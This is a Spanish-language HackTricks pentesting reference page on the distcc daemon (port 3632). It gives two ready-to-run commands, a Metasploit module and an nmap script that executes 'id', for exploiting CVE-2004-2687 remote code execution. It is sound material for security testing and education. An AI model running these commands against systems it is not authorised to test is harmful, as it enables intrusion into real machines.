tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
Información Básica
Distcc es una herramienta que mejora el proceso de compilación al utilizar la potencia de procesamiento inactiva de otras computadoras en la red. Cuando distcc está configurado en una máquina, esta máquina es capaz de distribuir sus tareas de compilación a otro sistema. Este sistema receptor debe estar ejecutando el daemon distccd y debe tener un compilador compatible instalado para procesar el código enviado.
Puerto por defecto: 3632
PORT STATE SERVICE
3632/tcp open distccd
Explotación
Verifique si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
No creo que shodan detecte este servicio.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post creado por Álex B (@r1p)
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.